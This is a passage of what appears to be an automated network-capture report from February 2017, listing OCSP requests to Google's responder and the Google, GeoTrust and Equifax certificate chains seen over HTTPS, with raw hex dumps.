f,<}Q'&alii]?SWvWbn8!R<lf';000s+y^g0H0B10UUS10UGeoTrust Inc.10UGeoTrust Global CA0161208112535Z171214112535Z02100.U'GeoTrust Global CA TGV OCSP Responder 50"0H0S!,t?dM@_=S,"Gdv_cD1N'E:a2{/rD+c2P!Xn}{{zI9Y/;fu,B_oBgo?Y\?yH]yi3F6Q{B19Kz\zP_.-!'Ym00U#0zhd}}eN0+00U%0+0U0U00"U0010UTGV-OFF-570	10
Feb 3, 2017 13:21:35.102744102 CET	80	49165	23.43.139.27	192.168.1.16	Data Raw: 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 04 6d 64 cc d9 e2 91 d5 79 56 7b db a2 d7 ba bc ec 79 3a 35 85 ca 40 6c 23 fe cb 35 b9 ef 10 d5 c9 e8 03 6f cc a3 58 06 d5 0f fc 2c 72 7d ee f2 b9 cb 0e b9 69 fa bc 33 99 8f 6f 17 65 ff 9e e3 65 35 Data Ascii: HmdyV{y:5@l#5oX,r}i3oee5@H/Q;vd?jm/hvAgaG\'b>LYTo<@>&19wN*AuebKPO47J{C\G0/aEo`z<;IA++#''	11
Feb 3, 2017 13:21:35.697237968 CET	49166	80	192.168.1.16	74.125.232.238	GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAa1FcpWF3k%2B HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: clients1.google.com	12
Feb 3, 2017 13:21:36.214596987 CET	80	49166	74.125.232.238	192.168.1.16	HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Tue, 31 Jan 2017 14:50:55 GMT Expires: Sat, 04 Feb 2017 14:50:55 GMT Server: ocsp_responder Content-Length: 463 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Age: 250241 Cache-Control: public, max-age=345600 Data Raw: 30 82 01 cb 0a 01 00 a0 82 01 c4 30 82 01 c0 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b1 30 82 01 ad 30 81 96 a2 16 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 18 0f 32 30 31 37 30 31 33 31 30 37 30 35 30 35 5a 30 6b 30 69 30 41 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 f2 e0 6a f9 85 8a 1d 8d 70 9b 49 19 23 7a a9 b5 1a 28 7e 64 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 02 08 06 b5 15 ca 56 17 79 3e 80 00 18 0f 32 30 31 37 30 31 33 31 30 37 30 35 30 35 5a a0 11 18 0f 32 30 31 37 30 32 30 37 30 37 30 35 30 35 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 6e 41 20 cd bd 38 b5 80 be 07 cc 39 57 94 27 01 ca fe 64 e7 c1 60 02 60 ca 35 31 aa 78 0a 78 bc b7 29 d7 7b ab 5d 40 6f e3 71 00 b9 ad 0f f5 42 0c 34 bb 85 bf f4 8e 89 08 fd 9c ff 35 60 72 f2 e1 d9 4f 91 1b 88 01 c4 4d 13 d0 62 a7 71 23 b6 bf 69 e5 b9 83 aa 81 58 9e 62 6f ca 2f 62 a6 23 7f aa 53 f6 30 6c 36 27 4b 62 3e 19 33 5f 8b cf 8b 46 9b 5a 78 17 4b 14 25 a0 59 79 7d fb 91 66 fd a6 35 80 82 96 8a f8 77 64 67 2f 3c 31 bc 48 5d e2 05 6e c6 85 e9 9a ea c4 47 d0 19 87 94 16 5e ed fa 74 1e ae e9 65 ea 2c 22 99 c3 f5 b0 2d 1b fd 9f 7a a2 af 68 c1 5b aa c9 0b 36 2b 40 9c 23 85 6c f3 06 b8 bd d9 20 1c fd ef 8b 10 d6 6e 55 22 f7 0e 54 84 01 99 23 66 43 56 d0 7d 59 01 23 9f e0 08 e4 b2 ad 13 07 bf e8 f0 6a 48 9c 05 e9 08 ca bb 07 ea 1e 0e 49 5e 3e f2 28 57 6d b5 Data Ascii: 00+000JhvbZ/20170131070505Z0k0i0A0+jpI#z(~dJhvbZ/Vy>20170131070505Z20170207070505Z0*HnA 89W'd``51xx){]@oqB45`rOMbq#iXbo/b#S0l6'Kb>3_FZxK%Yy}f5wdg/<1H]nG^te,"-zh[6+@#l nU"T#fCV}Y#jHI^>(Wm	13
Feb 3, 2017 13:21:36.416430950 CET	80	49166	74.125.232.238	192.168.1.16	HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Tue, 31 Jan 2017 14:50:55 GMT Expires: Sat, 04 Feb 2017 14:50:55 GMT Server: ocsp_responder Content-Length: 463 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Age: 250241 Cache-Control: public, max-age=345600 Data Raw: 30 82 01 cb 0a 01 00 a0 82 01 c4 30 82 01 c0 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b1 30 82 01 ad 30 81 96 a2 16 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 18 0f 32 30 31 37 30 31 33 31 30 37 30 35 30 35 5a 30 6b 30 69 30 41 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 f2 e0 6a f9 85 8a 1d 8d 70 9b 49 19 23 7a a9 b5 1a 28 7e 64 04 14 4a dd 06 16 1b bc f6 68 b5 76 f5 81 b6 bb 62 1a ba 5a 81 2f 02 08 06 b5 15 ca 56 17 79 3e 80 00 18 0f 32 30 31 37 30 31 33 31 30 37 30 35 30 35 5a a0 11 18 0f 32 30 31 37 30 32 30 37 30 37 30 35 30 35 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 6e 41 20 cd bd 38 b5 80 be 07 cc 39 57 94 27 01 ca fe 64 e7 c1 60 02 60 ca 35 31 aa 78 0a 78 bc b7 29 d7 7b ab 5d 40 6f e3 71 00 b9 ad 0f f5 42 0c 34 bb 85 bf f4 8e 89 08 fd 9c ff 35 60 72 f2 e1 d9 4f 91 1b 88 01 c4 4d 13 d0 62 a7 71 23 b6 bf 69 e5 b9 83 aa 81 58 9e 62 6f ca 2f 62 a6 23 7f aa 53 f6 30 6c 36 27 4b 62 3e 19 33 5f 8b cf 8b 46 9b 5a 78 17 4b 14 25 a0 59 79 7d fb 91 66 fd a6 35 80 82 96 8a f8 77 64 67 2f 3c 31 bc 48 5d e2 05 6e c6 85 e9 9a ea c4 47 d0 19 87 94 16 5e ed fa 74 1e ae e9 65 ea 2c 22 99 c3 f5 b0 2d 1b fd 9f 7a a2 af 68 c1 5b aa c9 0b 36 2b 40 9c 23 85 6c f3 06 b8 bd d9 20 1c fd ef 8b 10 d6 6e 55 22 f7 0e 54 84 01 99 23 66 43 56 d0 7d 59 01 23 9f e0 08 e4 b2 ad 13 07 bf e8 f0 6a 48 9c 05 e9 08 ca bb 07 ea 1e 0e 49 5e 3e f2 28 57 6d b5 Data Ascii: 00+000JhvbZ/20170131070505Z0k0i0A0+jpI#z(~dJhvbZ/Vy>20170131070505Z20170207070505Z0*HnA 89W'd``51xx){]@oqB45`rOMbq#iXbo/b#S0l6'Kb>3_FZxK%Yy}f5wdg/<1H]nG^te,"-zh[6+@#l nU"T#fCV}Y#jHI^>(Wm	14

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Feb 3, 2017 13:21:31.082077980 CET	443	49162	216.58.206.14	192.168.1.16	CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US	CN=Google Internet Authority G2, O=Google Inc, C=US	Wed Jan 25 11:14:39 CET 2017	Wed Apr 19 12:09:00 CEST 2017	[[ Version: V3 Subject: CN=.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 1, session object) public x coord: 40164073650765983093222213715647190143272823018761520515040876512246199096515 public y coord: 33713179030334130028084281084248999567363745265091161700985531589855936946847 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Wed Jan 25 11:14:39 CET 2017, To: Wed Apr 19 12:09:00 CEST 2017] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 06b515ca 5617793e]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: .google.com DNSName: .android.com DNSName: .appengine.google.com DNSName: .cloud.google.com DNSName: .gcp.gvt2.com DNSName: .google-analytics.com DNSName: .google.ca DNSName: .google.cl DNSName: .google.co.in DNSName: .google.co.jp DNSName: .google.co.uk DNSName: .google.com.ar DNSName: .google.com.au DNSName: .google.com.br DNSName: .google.com.co DNSName: .google.com.mx DNSName: .google.com.tr DNSName: .google.com.vn DNSName: .google.de DNSName: .google.es DNSName: .google.fr DNSName: .google.hu DNSName: .google.it DNSName: .google.nl DNSName: .google.pl DNSName: .google.pt DNSName: .googleadapis.com DNSName: .googleapis.cn DNSName: .googlecommerce.com DNSName: .googlevideo.com DNSName: .gstatic.cn DNSName: .gstatic.com DNSName: .gvt1.com DNSName: .gvt2.com DNSName: .metric.gstatic.com DNSName: .urchin.com DNSName: .url.google.com DNSName: .youtube-nocookie.com DNSName: .youtube.com DNSName: .youtubeeducation.com DNSName: .ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 63 89 3F 6B 6E 09 71 1F 08 45 E1 88 76 F2 42 .c.?kn.q..E..v.B0010: B7 09 0F 05 ....]]] Algorithm: [SHA256withRSA] Signature:0000: 47 31 69 E9 DB BB 8B 59 3D 31 42 DF 0F AF 0E EC G1i....Y=1B.....0010: 18 1A 31 07 50 D1 93 70 77 FC 2F 54 B8 3F AD 45 ..1.P..pw./T.?.E0020: C3 66 75 A1 96 B8 40 20 EC 37 D6 2E C7 A8 56 27 .fu...@ .7....V'0030: 30 2F 5C 3F EC AE 2A 63 6F 34 16 0A A0 3F 18 AB 0/\?..*co4...?..0040: 93 2F DE 08 C3 B1 98 9C 33 6D C4 97 47 D4 C2 4B ./......3m..G..K0050: 3A 67 08 7B 14 AD 93 6B 5D D9 BA 51 45 7F 0C F3 :g.....k]..QE...0060: 5C E5 44 ED 3D 74 46 0B 73 2D AF 53 7D B3 03 56 \.D.=tF.s-.S...V0070: 07 F7 43 9A C2 9C 05 87 9C CA 99 C1 34 50 B9 50 ..C.........4P.P0080: AB E5 BF 87 47 47 94 08 54 99 7E 76 03 C6 A5 7F ....GG..T..v....0090: 11 05 82 8A A6 12 B8 6D 35 87 D1 9A DF FB 1C 67 .......m5......g00A0: FE DC D9 B7 84 74 B1 B2 95 C3 9C 37 A2 53 CE D0 .....t.....7.S..00B0: 1D FE AB 43 35 CB 40 BE 6A 64 23 09 EF 28 DB B5 ...C5.@.jd#..(..00C0: 04 F4 D0 14 FD 74 F4 8E 34 C4 13 93 0F 78 93 5A .....t..4....x.Z00D0: 7B 30 92 9E C6 B6 F0 20 B8 3B 29 47 C1 75 29 00 .0..... .;)G.u).00E0: 9B 3E 65 6D 1F 15 0B 53 EC 3D 72 5E 41 97 2E 46 .>em...S.=r^A..F00F0: 65 62 6D 89 6F 84 4A 82 9C 0B 7C EC CB D6 96 13 ebm.o.J.........]
Feb 3, 2017 13:21:31.082077980 CET	443	49162	216.58.206.14	192.168.1.16	CN=Google Internet Authority G2, O=Google Inc, C=US	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	Wed Apr 01 02:00:00 CEST 2015	Mon Jan 01 00:59:59 CET 2018	[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Wed Apr 01 02:00:00 CEST 2015, To: Mon Jan 01 00:59:59 CET 2018] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 023a92]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: 08 4E 04 A7 80 7F 10 16 43 5E 02 AD D7 42 80 F4 .N......C^...B..0010: B0 8E D2 AE B3 EB 11 7D 90 84 18 7D E7 90 15 FB ................0020: 49 7F A8 99 05 91 BB 7A C9 D6 3C 37 18 09 9A B6 I......z..<7....0030: C7 92 20 07 35 33 09 E4 28 63 72 0D B4 E0 32 9C .. .53..(cr...2.0040: 87 98 C4 1B 76 89 67 C1 50 58 B0 13 AA 13 1A 1B ....v.g.PX......0050: 32 A5 BE EA 11 95 4C 48 63 49 E9 99 5D 20 37 CC 2.....LHcI..] 7.0060: FE 2A 69 51 16 95 4B A9 DE 49 82 C0 10 70 F4 2C .*iQ..K..I...p.,0070: F3 EC BC 24 24 D0 4E AC A5 D9 5E 1E 6D 92 C1 A7 ...$$.N...^.m...0080: AC 48 35 81 F9 E5 E4 9C 65 69 CD 87 A4 41 50 3F .H5.....ei...AP?0090: 2E 57 A5 91 51 12 58 0E 8C 09 A1 AC 7A A4 12 A5 .W..Q.X.....z...00A0: 27 F3 9A 10 97 7D 55 03 06 F7 66 58 5F 5F 64 E1 '.....U...fX__d.00B0: AB 5D 6D A5 39 48 75 98 4C 29 5A 3A 8D D3 2B CA .]m.9Hu.L)Z:..+.00C0: 9C 55 04 BF F4 E6 14 D5 80 AC 26 ED 17 89 A6 93 .U........&.....00D0: 6C 5C A4 CC B8 F0 66 8E 64 E3 7D 9A E2 00 B3 49 l\....f.d......I00E0: C7 E4 0A AA DD 5B 83 C7 70 90 46 4E BE D0 DB 59 .....[..p.FN...Y00F0: 96 6C 2E F5 16 36 DE 71 CC 01 C2 12 C1 21 C6 16 .l...6.q.....!..]
Feb 3, 2017 13:21:31.082077980 CET	443	49162	216.58.206.14	192.168.1.16	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	OU=Equifax Secure Certificate Authority, O=Equifax, C=US	Tue May 21 06:00:00 CEST 2002	Tue Aug 21 06:00:00 CEST 2018	[[ Version: V3 Subject: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 27620593608073140957439440929253438012688864718977347268272053725994928948867769687165112265058896553974818505070806430256424431940072485024407486246475597522063246121214348496326377341879755851197260401080498544606788760407243324127929930612201002157618691487713632251700065187865963692723720912135393438861302779432180613616167225206519123176430362410262429702404863434904116727055203524505580952824336979641923534005571504410997292144760317953739063178352809680844232935574095508445145910310675421726257114605895831426222686272114090063230017292595425393719031924942422176213538487957041730136782988405751614792953 public exponent: 65537 Validity: [From: Tue May 21 06:00:00 CEST 2002, To: Tue Aug 21 06:00:00 CEST 2018] Issuer: OU=Equifax Secure Certificate Authority, O=Equifax, C=US SerialNumber: [ 12bbe6]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 48 E6 68 F9 2B D2 B2 95 D7 47 D8 23 20 10 4F 33 H.h.+....G.# .O30010: 98 90 9F D4 ....]][2]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.geotrust.com/crls/secureca.crl]]][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 2D 68 74 74 70 73 3A 2F 2F 77 77 77 2E 67 65 .-https://www.ge0010: 6F 74 72 75 73 74 2E 63 6F 6D 2F 72 65 73 6F 75 otrust.com/resou0020: 72 63 65 73 2F 72 65 70 6F 73 69 74 6F 72 79 rces/repository]] ]][5]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]]] Algorithm: [SHA1withRSA] Signature:0000: 76 E1 12 6E 4E 4B 16 12 86 30 06 B2 81 08 CF F0 v..nNK...0......0010: 08 C7 C7 71 7E 66 EE C2 ED D4 3B 1F FF F0 F0 C8 ...q.f....;.....0020: 4E D6 43 38 B0 B9 30 7D 18 D0 55 83 A2 6A CB 36 N.C8..0...U..j.60030: 11 9C E8 48 66 A3 6D 7F B8 13 D4 47 FE 8B 5A 5C ...Hf.m....G..Z\0040: 73 FC AE D9 1B 32 19 38 AB 97 34 14 AA 96 D2 EB s....2.8..4.....0050: A3 1C 14 08 49 B6 BB E5 91 EF 83 36 EB 1D 56 6F ....I......6..Vo0060: CA DA BC 73 63 90 E4 7F 7B 3E 22 CB 3D 07 ED 5F ...sc....>".=.._0070: 38 74 9C E3 03 50 4E A1 AF 98 EE 61 F2 84 3F 12 8t...PN....a..?.]
Feb 3, 2017 13:21:40.892060995 CET	443	49168	172.217.22.46	192.168.1.16	CN=*.google.com, O=Google Inc, L=Mountain View, ST=California, C=US	CN=Google Internet Authority G2, O=Google Inc, C=US	Wed Jan 25 11:14:39 CET 2017	Wed Apr 19 12:09:00 CEST 2017	[[ Version: V3 Subject: CN=.google.com, O=Google Inc, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 1, session object) public x coord: 40164073650765983093222213715647190143272823018761520515040876512246199096515 public y coord: 33713179030334130028084281084248999567363745265091161700985531589855936946847 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Wed Jan 25 11:14:39 CET 2017, To: Wed Apr 19 12:09:00 CEST 2017] Issuer: CN=Google Internet Authority G2, O=Google Inc, C=US SerialNumber: [ 06b515ca 5617793e]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.google.com/GIAG2.crt, accessMethod: ocsp accessLocation: URIName: http://clients1.google.com/ocsp]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://pki.google.com/GIAG2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: .google.com DNSName: .android.com DNSName: .appengine.google.com DNSName: .cloud.google.com DNSName: .gcp.gvt2.com DNSName: .google-analytics.com DNSName: .google.ca DNSName: .google.cl DNSName: .google.co.in DNSName: .google.co.jp DNSName: .google.co.uk DNSName: .google.com.ar DNSName: .google.com.au DNSName: .google.com.br DNSName: .google.com.co DNSName: .google.com.mx DNSName: .google.com.tr DNSName: .google.com.vn DNSName: .google.de DNSName: .google.es DNSName: .google.fr DNSName: .google.hu DNSName: .google.it DNSName: .google.nl DNSName: .google.pl DNSName: .google.pt DNSName: .googleadapis.com DNSName: .googleapis.cn DNSName: .googlecommerce.com DNSName: .googlevideo.com DNSName: .gstatic.cn DNSName: .gstatic.com DNSName: .gvt1.com DNSName: .gvt2.com DNSName: .metric.gstatic.com DNSName: .urchin.com DNSName: .url.google.com DNSName: .youtube-nocookie.com DNSName: .youtube.com DNSName: .youtubeeducation.com DNSName: .ytimg.com DNSName: android.clients.google.com DNSName: android.com DNSName: developer.android.google.cn DNSName: g.co DNSName: goo.gl DNSName: google-analytics.com DNSName: google.com DNSName: googlecommerce.com DNSName: urchin.com DNSName: www.goo.gl DNSName: youtu.be DNSName: youtube.com DNSName: youtubeeducation.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 63 89 3F 6B 6E 09 71 1F 08 45 E1 88 76 F2 42 .c.?kn.q..E..v.B0010: B7 09 0F 05 ....]]] Algorithm: [SHA256withRSA] Signature:0000: 47 31 69 E9 DB BB 8B 59 3D 31 42 DF 0F AF 0E EC G1i....Y=1B.....0010: 18 1A 31 07 50 D1 93 70 77 FC 2F 54 B8 3F AD 45 ..1.P..pw./T.?.E0020: C3 66 75 A1 96 B8 40 20 EC 37 D6 2E C7 A8 56 27 .fu...@ .7....V'0030: 30 2F 5C 3F EC AE 2A 63 6F 34 16 0A A0 3F 18 AB 0/\?..*co4...?..0040: 93 2F DE 08 C3 B1 98 9C 33 6D C4 97 47 D4 C2 4B ./......3m..G..K0050: 3A 67 08 7B 14 AD 93 6B 5D D9 BA 51 45 7F 0C F3 :g.....k]..QE...0060: 5C E5 44 ED 3D 74 46 0B 73 2D AF 53 7D B3 03 56 \.D.=tF.s-.S...V0070: 07 F7 43 9A C2 9C 05 87 9C CA 99 C1 34 50 B9 50 ..C.........4P.P0080: AB E5 BF 87 47 47 94 08 54 99 7E 76 03 C6 A5 7F ....GG..T..v....0090: 11 05 82 8A A6 12 B8 6D 35 87 D1 9A DF FB 1C 67 .......m5......g00A0: FE DC D9 B7 84 74 B1 B2 95 C3 9C 37 A2 53 CE D0 .....t.....7.S..00B0: 1D FE AB 43 35 CB 40 BE 6A 64 23 09 EF 28 DB B5 ...C5.@.jd#..(..00C0: 04 F4 D0 14 FD 74 F4 8E 34 C4 13 93 0F 78 93 5A .....t..4....x.Z00D0: 7B 30 92 9E C6 B6 F0 20 B8 3B 29 47 C1 75 29 00 .0..... .;)G.u).00E0: 9B 3E 65 6D 1F 15 0B 53 EC 3D 72 5E 41 97 2E 46 .>em...S.=r^A..F00F0: 65 62 6D 89 6F 84 4A 82 9C 0B 7C EC CB D6 96 13 ebm.o.J.........]
Feb 3, 2017 13:21:40.892060995 CET	443	49168	172.217.22.46	192.168.1.16	CN=Google Internet Authority G2, O=Google Inc, C=US	CN=GeoTrust Global CA, O=GeoTrust Inc., C=US	Wed Apr 01 02:00:00 CEST 2015	Mon Jan 01 00:59:59 CET 2018	[[ Version: V3 Subject: CN=Google Internet Authority G2, O=Google Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19713895149719550196537065661910573762693934593220985668782860735427060889140793885919063737778303548724916253252606564904177491762533295616984617709378739783748100146882543612565825906799282133510087546060971220666055151463898734279731009956582933624646298029265838127046200538496591314458940937082185029845612274584845875286257057247598474925565775989866310636633768255501748172403430876460228793912189332026189491067186811703150477068536877439284697584041860237489395099402658887745588613142391209024263265842301844868193180477031165936332420984796347731387363914950895491332976177715889375379088870580457661428329 public exponent: 65537 Validity: [From: Wed Apr 01 02:00:00 CEST 2015, To: Mon Jan 01 00:59:59 CET 2018] Issuer: CN=GeoTrust Global CA, O=GeoTrust Inc., C=US SerialNumber: [ 023a92]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://g.symcd.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C0 7A 98 68 8D 89 FB AB 05 64 0C 11 7D AA 7D 65 .z.h.....d.....e0010: B8 CA CC 4E ...N]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://g.symcb.com/crls/gtglobal.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.1][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 4A DD 06 16 1B BC F6 68 B5 76 F5 81 B6 BB 62 1A J......h.v....b.0010: BA 5A 81 2F .Z./]]] Algorithm: [SHA256withRSA] Signature:0000: 08 4E 04 A7 80 7F 10 16 43 5E 02 AD D7 42 80 F4 .N......C^...B..0010: B0 8E D2 AE B3 EB 11 7D 90 84 18 7D E7 90 15 FB ................0020: 49 7F A8 99 05 91 BB 7A C9 D6 3C 37 18 09 9A B6 I......z..<7....0030: C7 92 20 07 35 33 09 E4 28 63 72 0D B4 E0 32 9C .. .53..(cr...2.0040: 87 98 C4 1B 76 89 67 C1 50 58 B0 13 AA 13 1A 1B ....v.g.PX......0050: 32 A5 BE EA 11 95 4C 48 63 49 E9 99 5D 20 37 CC 2.....LHcI..] 7.0060: FE 2A 69 51 16 95 4B A9 DE 49 82 C0 10 70 F4 2C .*iQ..K..I...p.,0070: F3 EC BC 24 24 D0 4E AC A5 D9 5E 1E 6D 92 C1 A7 ...$$.N...^.m...0080: AC 48 35 81 F9 E5 E4 9C 65 69 CD 87 A4 41 50 3F .H5.....ei...AP?0090: 2E 57 A5 91 51 12 58 0E 8C 09 A1 AC 7A A4 12 A5 .W..Q.X.....z...00A0: 27 F3 9A 10 97 7D 55 03 06 F7 66 58 5F 5F 64 E1 '.....U...fX__d.00B0: AB 5D 6D A5 39 48 75 98 4C 29 5A 3A 8D D3 2B CA .]m.9Hu.L)Z:..+.00C0: 9C 55 04 BF F4 E6 14 D5 80 AC 26 ED 17 89 A6 93 .U........&.....00D0: 6C 5C A4 CC B8 F0 66 8E 64 E3 7D 9A E2 00 B3 49 l\....f.d......I00E0: C7 E4 0A AA DD 5B 83 C7 70 90 46 4E BE D0 DB 59 .....[..p.FN...Y00F0: 96 6C 2E F5 16 36 DE 71 CC 01 C2 12 C1 21 C6 16 .l...6.q.....!..]
